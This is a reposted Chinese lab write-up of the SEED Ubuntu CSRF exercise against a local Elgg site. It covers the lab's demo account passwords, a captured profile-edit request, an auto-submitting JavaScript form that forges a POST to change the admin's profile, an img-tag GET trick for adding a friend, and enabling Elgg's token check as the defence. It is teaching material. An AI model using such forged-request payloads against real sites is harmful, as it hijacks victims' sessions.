一定要看到结尾,你会看到一个魔术!长衫大佬可以坐下来,听听我讲(tree)故(new)事(bee):
CSRF简介
CSRF(Cross-site request forgery)跨站请求伪造
可信站点 Elgg网站 可信站点的受害用户 admin用户
恶意用户 恶意站点 攻击者网站
1.admin使用他的用户名密码登录到Elgg
2.Elgg将admin的会话标识符存储在admin的Web浏览器的cookie中
3.admin被诱导访问攻击者网站
4.攻击者网站 是一个自提交的表单
5.web浏览器把cookie附加在请求中 一并发送到Elgg网站
6.Elgg处理这个GET/POST请求 攻击发生!
如果你已经完成了XSS攻击防范实验 那么CSRF攻击对你来说就很简单了!
- 浏览器配置
安装LiveHTTPHeaders插件
- Apache配置SEEDUbuntu12.04预安装 我们只要启动即可!
- Elgg网站安装SEEDUbuntu12.04预安装
和XSS攻击实验一样:
User UserName Password
Admin admin seedelgg
Alice alice seedalice
Boby boby seedboby
Charlie charlie seedcharlie
Samy samy seedsamy
SEEDUbuntu12.04预安装 URL Description Directory
www.csrflabattacker 攻击者网站 /var/www/CSRF/Attacker/
www.csrflabelgg Elgg网站 /var/www/CSRF/Elgg/
在一台服务器上搭建多个站点的网站 已经在XSS实验中教过了!!
修改/etc/hosts文件:
192.168.59.155 www.csrflabelgg
192.168.59.155 www.csrflabattacker
现在你已经能成功访问上面的2个网站了!!
开始咱们的CSRF攻击实验吧!
攻击者希望admin添加自己好友 但是admin不同意 咋办?
咱们先自己添加一下好友 看看这个动作到底干了什么 通过HTTPHeaderLive我们可以看到是个GET请求!!
请求地址如下 我们在攻击者网站构造一个img标签 实现自动GET请求:=43&__elgg_ts=1529135222&__elgg_token=a2b973d09b00ab37ce9b443ae659150f
攻击者希望admin帮他打广告 但是admin不同意 咋办?
咱们这里说的打广告 只是个比喻 实际上做的是 要求admin修改一下个人简介
admin当然不干了 你叫我改我就改啊? 我和你很熟吗? 我admin可是站长 有脾气的!!
咱们先看看修改个人简介这个动作 到底是什么操作? 通过HTTPHeaderLive我们可以看到是个POST请求 !!
POST : www.csrflabelgg
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 565
Cookie: Elgg=lgpeqhed4b0ei8c1nid9kgonj2
Connection: keep-alive
Upgrade-Insecure-Requests: 1__elgg_token=4758d8fee39a3a3ca0e3eb2d8c9f43b7
&__elgg_ts=1529136959
&name=admin
&description=
&accesslevel[description]=2
&briefdescription=我是admin站长大人!!!
&accesslevel[briefdescription]=2
&location=
&accesslevel[location]=2
&interests=
&accesslevel[interests]=2
&skills=
&accesslevel[skills]=2
&contactemail=
&accesslevel[contactemail]=2
&phone=&accesslevel[phone]=2
&mobile=
&accesslevel[mobile]=2
&website=&accesslevel[website]=2
&twitter=
&accesslevel[twitter]=2
&guid=33
CSRF攻击前:
攻击者可以构造自动提交的POST表单:
<html>
<body>
<h1>This page forges an HTTP POST request.</h1>
<script type="text/javascript">
function post(url,fields)
{var p = ateElement("form");p.action = url;p.innerHTML = fields;p.target = "_blank";p.method = "post";document.body.appendChild(p);p.submit();
}
function csrf_hack()
{var fields = "";fields += "<input type='hidden' name='name' value='Admin'>";fields += "<input type='hidden' name='description' value='hackbiji'>";fields += "<input type='hidden' name='accesslevel[description]' value='2'>";fields += "<input type='hidden' name='briefdescription' value='hackbiji'>";fields += "<input type='hidden' name='accesslevel[briefdescription]' value='2'>";fields += "<input type='hidden' name='location' value=''>";fields += "<input type='hidden' name='accesslevel[location]' value='2'>";fields += "<input type='hidden' name='guid' value='33'>";var url = "";post(url,fields);
}
load = function() { csrf_hack();}
</script>
</body>
</html>
CSRF攻击后:
中小企业应付Web攻击的最好的建议:部署WAF
技术层面防御CSRF攻击:
- 什么是浏览器同源保护策略?
采用Token验证请求的合法性
同源的定义:
1.协议相同
2.域名相同
3.端口相同
开启Elgg网站的CSRF保护策略!!
在/var/www/CSRF/elgg/engine/lib/action.php 文件中 注释掉return true 重启apache服务器 记得清空缓存继续实验!!!如下图CSRF攻击无效!!!
function action_gatekeeper($action) {
//return true;
...
...
}
本文发布于:2024-02-02 00:36:48,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/170681079340252.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
| 留言与评论(共有 0 条评论) |
